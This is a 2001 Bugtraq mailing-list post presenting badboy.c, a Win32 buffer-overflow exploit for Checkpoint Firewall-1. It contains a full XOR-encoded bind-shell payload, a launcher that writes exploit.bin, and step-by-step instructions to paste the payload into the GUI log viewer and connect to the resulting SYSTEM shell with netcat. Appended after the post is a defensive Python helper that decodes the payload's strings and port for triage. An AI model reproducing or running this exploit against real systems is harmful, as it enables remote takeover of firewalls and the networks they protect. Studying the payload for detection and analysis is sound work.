Firewall-1 remote SYSTEM shell buffer overflow

From: Indigo (indig0@talk21.com)
Date: 11/28/01


Date: 28 Nov 2001 20:08:14 -0000
Message-ID: <20011128200814.10070.qmail@mail.securityfocus.com>
From: Indigo <indig0@talk21.com>
To: bugtraq@securityfocus.com
Subject: Firewall-1 remote SYSTEM shell buffer overflow


Mailer: SecurityFocus

As you can see I've got a few weeks free between
jobs to write some overflows!

Here's badboy.c, the overflow for Checkpoint Firewall-1

NB The overflow only works if you launch the attack
from a valid GUI client machine i.e. your IP address
must be present in the target firewall's
$FWDIR/conf/gui-clients file.

Cheers

Indigo


/* badboy.c - Win32 Checkpoint Firewall-1 overflow exploit by Indigo <indig0@talk21.com> 2001

        Usage: badboy <victim port>

        The shellcode spawns a shell on the chosen port

        Main shellcode adapted from code written by izan@deepzone.org

        Greets to:

        Morphsta, Br00t, Macavity, Jacob & Monkfish...Not forgetting D-Niderlunds
*/


#include <windows.h>   /* htons() comes in via the winsock header windows.h pulls in */
#include <stdio.h>
#include <stdlib.h>    /* atoi(), exit() */

int main(int argc, char **argv)
{
                                
unsigned char shellcode[] =
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\xCC\x2B\x16\xEA\x77\x90\x90\xEB\x05\x4A\xD5"
        "\xEC\x77\x90\x90\x90\x90\x90\x66\x81\xE9\x5B\x29\x31\xDB\xB8\x99"
        "\x99\x99\x99\x31\x01\x83\xC1\x04\x83\xC3\x04\x66\x81\xFB\xC0\x04"
        "\x7E\xF1\x66\x81\xE9\x4E\x01\x31\xC0\x40\x29\x01\x90\x90\x90\x71"
        "\x99\x99\x99\x99\xC4\x18\x74\x40\xB8\xD9\x99\x14\x2C\x6B\xBD\xD9"
        "\x99\x14\x24\x63\xBD\xD9\x99\xF3\x9E\x09\x09\x09\x09\xC0\x71\x4B"
        "\x9B\x99\x99\x14\x2C\xB3\xBC\xD9\x99\x14\x24\xAA\xBC\xD9\x99\xF3"
        "\x93\x09\x09\x09\x09\xC0\x71\x23\x9B\x99\x99\xF3\x99\x14\x2C\x40"
        "\xBC\xD9\x99\xCF\x14\x2C\x7C\xBC\xD9\x99\xCF\x14\x2C\x70\xBC\xD9"
        "\x99\xCF\x66\x0C\xAA\xBC\xD9\x99\xF3\x99\x14\x2C\x40\xBC\xD9\x99"
        "\xCF\x14\x2C\x74\xBC\xD9\x99\xCF\x14\x2C\x68\xBC\xD9\x99\xCF\x66"
        "\x0C\xAA\xBC\xD9\x99\x5E\x1C\x6C\xBC\xD9\x99\xDD\x99\x99\x99\x14"
        "\x2C\x6C\xBC\xD9\x99\xCF\x66\x0C\xAE\xBC\xD9\x99\x14\x2C\xB4\xBF"
        "\xD9\x99\x34\xC9\x66\x0C\xCA\xBC\xD9\x99\x14\x2C\xA8\xBF\xD9\x99"
        "\x34\xC9\x66\x0C\xCA\xBC\xD9\x99\x14\x2C\x68\xBC\xD9\x99\x14\x24"
        "\xB4\xBF\xD9\x99\x3C\x14\x2C\x7C\xBC\xD9\x99\x34\x14\x24\xA8\xBF"
        "\xD9\x99\x32\x14\x24\xAC\xBF\xD9\x99\x32\x5E\x1C\xBC\xBF\xD9\x99"
        "\x99\x99\x99\x99\x5E\x1C\xB8\xBF\xD9\x99\x98\x98\x99\x99\x14\x2C"
        "\xA0\xBF\xD9\x99\xCF\x14\x2C\x6C\xBC\xD9\x99\xCF\xF3\x99\xF3\x99"
        "\xF3\x89\xF3\x98\xF3\x99\xF3\x99\x14\x2C\xD0\xBF\xD9\x99\xCF\xF3"
        "\x99\x66\x0C\xA2\xBC\xD9\x99\xF1\x99\xB9\x99\x99\x09\xF1\x99\x9B"
        "\x99\x99\x66\x0C\xDA\xBC\xD9\x99\x10\x1C\xC8\xBF\xD9\x99\xAA\x59"
        "\xC9\xD9\xC9\xD9\xC9\x66\x0C\x63\xBD\xD9\x99\xC9\xC2\xF3\x89\x14"
        "\x2C\x50\xBC\xD9\x99\xCF\xCA\x66\x0C\x67\xBD\xD9\x99\xF3\x9A\xCA"
        "\x66\x0C\x9B\xBC\xD9\x99\x14\x2C\xCC\xBF\xD9\x99\xCF\x14\x2C\x50"
        "\xBC\xD9\x99\xCF\xCA\x66\x0C\x9F\xBC\xD9\x99\x14\x24\xC0\xBF\xD9"
        "\x99\x32\xAA\x59\xC9\x14\x24\xFC\xBF\xD9\x99\xCE\xC9\xC9\xC9\x14"
        "\x2C\x70\xBC\xD9\x99\x34\xC9\x66\x0C\xA6\xBC\xD9\x99\xF3\xA9\x66"
        "\x0C\xD6\xBC\xD9\x99\x72\xD4\x09\x09\x09\xAA\x59\xC9\x14\x24\xFC"
        "\xBF\xD9\x99\xCE\xC9\xC9\xC9\x14\x2C\x70\xBC\xD9\x99\x34\xC9\x66"
        "\x0C\xA6\xBC\xD9\x99\xF3\xA9\x66\x0C\xD6\xBC\xD9\x99\x1A\x24\xFC"
        "\xBF\xD9\x99\x9B\x96\x1B\x8E\x98\x99\x99\x18\x24\xFC\xBF\xD9\x99"
        "\x98\xB9\x99\x99\xEB\x97\x09\x09\x09\x09\x5E\x1C\xFC\xBF\xD9\x99"
        "\x99\xB9\x99\x99\xF3\x99\x12\x1C\xFC\xBF\xD9\x99\x14\x24\xFC\xBF"
        "\xD9\x99\xCE\xC9\x12\x1C\xC8\xBF\xD9\x99\xC9\x14\x2C\x70\xBC\xD9"
        "\x99\x34\xC9\x66\x0C\xDE\xBC\xD9\x99\xF3\xA9\x66\x0C\xD6\xBC\xD9"
        "\x99\x12\x1C\xFC\xBF\xD9\x99\xF3\x99\xC9\x14\x2C\xC8\xBF\xD9\x99"
        "\x34\xC9\x14\x2C\xC0\xBF\xD9\x99\x34\xC9\x66\x0C\x93\xBC\xD9\x99"
        "\xF3\x99\x14\x24\xFC\xBF\xD9\x99\xCE\xF3\x99\xF3\x99\xF3\x99\x14"
        "\x2C\x70\xBC\xD9\x99\x34\xC9\x66\x0C\xA6\xBC\xD9\x99\xF3\xA9\x66"
        "\x0C\xD6\xBC\xD9\x99\xAA\x50\xA0\x14\xFC\xBF\xD9\x99\x96\x1E\xFE"
        "\x66\x66\x66\xF3\x99\xF1\x99\xB9\x99\x99\x09\x14\x2C\xC8\xBF\xD9"
        "\x99\x34\xC9\x14\x2C\xC0\xBF\xD9\x99\x34\xC9\x66\x0C\x97\xBC\xD9"
        "\x99\x10\x1C\xF8\xBF\xD9\x99\xF3\x99\x14\x24\xFC\xBF\xD9\x99\xCE"
        "\xC9\x14\x2C\xC8\xBF\xD9\x99\x34\xC9\x14\x2C\x74\xBC\xD9\x99\x34"
        "\xC9\x66\x0C\xD2\xBC\xD9\x99\xF3\xA9\x66\x0C\xD6\xBC\xD9\x99\xF3"
        "\x99\x12\x1C\xF8\xBF\xD9\x99\x14\x24\xFC\xBF\xD9\x99\xCE\xC9\x12"
        "\x1C\xC8\xBF\xD9\x99\xC9\x14\x2C\x70\xBC\xD9\x99\x34\xC9\x66\x0C"
        "\xDE\xBC\xD9\x99\xF3\xA9\x66\x0C\xD6\xBC\xD9\x99\x70\x20\x67\x66"
        "\x66\x14\x2C\xC0\xBF\xD9\x99\x34\xC9\x66\x0C\x8B\xBC\xD9\x99\x14"
        "\x2C\xC4\xBF\xD9\x99\x34\xC9\x66\x0C\x8B\xBC\xD9\x99\xF3\x99\x66"
        "\x0C\xCE\xBC\xD9\x99\xC8\xCF\xF1\xED\xDC\x16\x99\x09\xC3\x66\x8B"
        "\xC9\xC2\xC0\xCE\xC7\xC8\xCF\xCA\xF1\xE1\xDC\x16\x99\x09\xC3\x66"
        "\x8B\xC9\x35\x1D\x59\xEC\x62\xC1\x32\xC0\x7B\x70\x5A\xCE\xCA\xD6"
        "\xDA\xD2\xAA\xAB\x99\xEA\xF6\xFA\xF2\xFC\xED\x99\xFB\xF0\xF7\xFD"
        "\x99\xF5\xF0\xEA\xED\xFC\xF7\x99\xF8\xFA\xFA\xFC\xE9\xED\x99\xEA"
        "\xFC\xF7\xFD\x99\xEB\xFC\xFA\xEF\x99\xFA\xF5\xF6\xEA\xFC\xEA\xF6"
        "\xFA\xF2\xFC\xED\x99\xD2\xDC\xCB\xD7\xDC\xD5\xAA\xAB\x99\xDA\xEB"
        "\xFC\xF8\xED\xFC\xC9\xF0\xE9\xFC\x99\xDE\xFC\xED\xCA\xED\xF8\xEB"
        "\xED\xEC\xE9\xD0\xF7\xFE\xF6\xD8\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9"
        "\xEB\xF6\xFA\xFC\xEA\xEA\xD8\x99\xC9\xFC\xFC\xF2\xD7\xF8\xF4\xFC"
        "\xFD\xC9\xF0\xE9\xFC\x99\xDE\xF5\xF6\xFB\xF8\xF5\xD8\xF5\xF5\xF6"
        "\xFA\x99\xCB\xFC\xF8\xFD\xDF\xF0\xF5\xFC\x99\xCE\xEB\xF0\xED\xFC"
        "\xDF\xF0\xF5\xFC\x99\xCA\xF5\xFC\xFC\xE9\x99\xDA\xF5\xF6\xEA\xFC"
        "\xD1\xF8\xF7\xFD\xF5\xFC\x99\xDC\xE1\xF0\xED\xC9\xEB\xF6\xFA\xFC"
        "\xEA\xEA\x99\xDA\xF6\xFD\xFC\xFD\xB9\xFB\xE0\xB9\xE5\xC3\xF8\xF7"
        "\xB9\xA5\xF0\xE3\xF8\xF7\xD9\xFD\xFC\xFC\xE9\xE3\xF6\xF7\xFC\xB7"
        "\xF6\xEB\xFE\xA7\x9B\x99\x86\xD1\x99\x99\x99\x99\x99\x99\x99\x99"
        "\x99\x99\x99\x99\x95\x99\x99\x99\x99\x99\x99\x99\x98\x99\x99\x99"
        "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
        "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
        "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
        "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
        "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
        "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
        "\x99\x99\x99\x99\xDA\xD4\xDD\xB7\xDC\xC1\xDC\x99\x99\x99\x99\x99"
        "\x89\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
        "\x99\x99\x99\x99\x90\x90\x90\x90\x90\x00";

                

FILE *fp;
unsigned short int a_port;

printf ("\nFirewall-1 buffer overflow launcher\nby Indigo <indig0@talk21.com> 2001\n\n");
printf ("To perform this exploit you must attack from a valid GUI client machine\n");
printf ("i.e. your IP address must be contained in the $FWDIR/conf/gui-clients file\n");
printf ("This program will create a binary file called exploit.bin\n");
printf ("First open the Firewall-1 GUI log viewer program then enter\nthe victim IP address in the Management Server field\n");
printf ("and a few random characters in the password field,\n");
printf ("open exploit.bin in notepad, highlight it all then copy it to the clipboard.\n");
printf ("Paste it into the User Name field of the GUI log viewer then click OK.\n\n");
printf ("Launch netcat: nc <victim host> <victim port>\n");
printf ("\nThe exploit spawns a SYSTEM shell on the chosen port\n\n");

if (argc != 2)
{
        printf ("Usage: %s <victim port>\n", argv[0]);
        exit (0);
}

/* The payload body is XOR-encoded with 0x99, so the port is stored the same
   way: network byte order (htons), then each byte XORed with 0x99. */
a_port = htons(atoi(argv[1]));
a_port^= 0x9999;

shellcode[1567]= (a_port) & 0xff;
shellcode[1568]= (a_port >> 8) & 0xff;

fp = fopen ("./exploit.bin","wb");
if (fp == NULL)
{
        perror ("fopen");
        return 1;
}

/* fputs() stops at the first NUL byte. The encoded payload contains none
   before its terminator unless a port byte happens to equal 0x99, which
   would encode to 0x00 and truncate the file. */
fputs ((const char *)shellcode, fp);

fclose (fp);

return 0;

}
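An added analysis helper, not part of Indigo's post or of the original payload: it assumes the single-byte key 0x99 that the decoder stub at the front of the payload applies (it loads 0x99999999 and XORs it over the body) and that badboy.c patches the port with the same key (a_port ^= 0x9999). Decoding an excerpt of the bytes above recovers the import names and the port the payload ships with, which is the check a responder wants when confirming what a captured copy of this payload does.

```python
import struct

# Single-byte key: the decoder stub in the payload does mov eax,0x99999999 / xor [ecx],eax.
XOR_KEY = 0x99

# Constructed excerpt: byte runs copied from the payload above, in the order they
# appear there, each followed by its encoded NUL separator (0x00 ^ 0x99 = 0x99).
ENCODED_EXCERPT = bytes([
    0xEA, 0xF6, 0xFA, 0xF2, 0xFC, 0xED, 0x99,              # "socket"
    0xFB, 0xF0, 0xF7, 0xFD, 0x99,                          # "bind"
    0xF5, 0xF0, 0xEA, 0xED, 0xFC, 0xF7, 0x99,              # "listen"
    0xF8, 0xFA, 0xFA, 0xFC, 0xE9, 0xED, 0x99,              # "accept"
    0xD2, 0xDC, 0xCB, 0xD7, 0xDC, 0xD5, 0xAA, 0xAB, 0x99,  # "KERNEL32"
    0xDA, 0xD4, 0xDD, 0xB7, 0xDC, 0xC1, 0xDC, 0x99,        # "CMD.EXE"
])

# The two bytes badboy.c overwrites at shellcode[1567] and shellcode[1568];
# in the published payload they are \x86\xD1 (the placeholder port it ships with).
PUBLISHED_PORT_BYTES = bytes([0x86, 0xD1])


def xor_decode(data: bytes, key: int = XOR_KEY) -> bytes:
    """Undo the single-byte XOR; the first step when triaging a captured copy."""
    return bytes(b ^ key for b in data)


def extract_strings(decoded: bytes, min_len: int = 4) -> list:
    """Split the decoded body on NUL and keep printable-ASCII runs (as `strings` would)."""
    return [
        chunk.decode("ascii")
        for chunk in decoded.split(b"\x00")
        if len(chunk) >= min_len and all(0x20 <= b < 0x7F for b in chunk)
    ]


def decode_port_field(field: bytes) -> int:
    """Recover the listener port from the patched field.

    badboy.c stores htons(port) ^ 0x9999, so after the per-byte XOR the two bytes
    are the port in network byte order. They sit where the sin_port member of a
    sockaddr_in would: the 0x9B 0x99 just before them decodes to 0x0002, AF_INET.
    """
    return struct.unpack(">H", xor_decode(field))[0]


def encode_port_field(port: int) -> bytes:
    """Mirror of what badboy.c writes. A port byte equal to 0x99 encodes to 0x00,
    which is where fputs() in badboy.c would stop writing exploit.bin."""
    return xor_decode(struct.pack(">H", port))  # XOR is its own inverse


if __name__ == "__main__":
    print(extract_strings(xor_decode(ENCODED_EXCERPT)))
    print(decode_port_field(PUBLISHED_PORT_BYTES))
```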


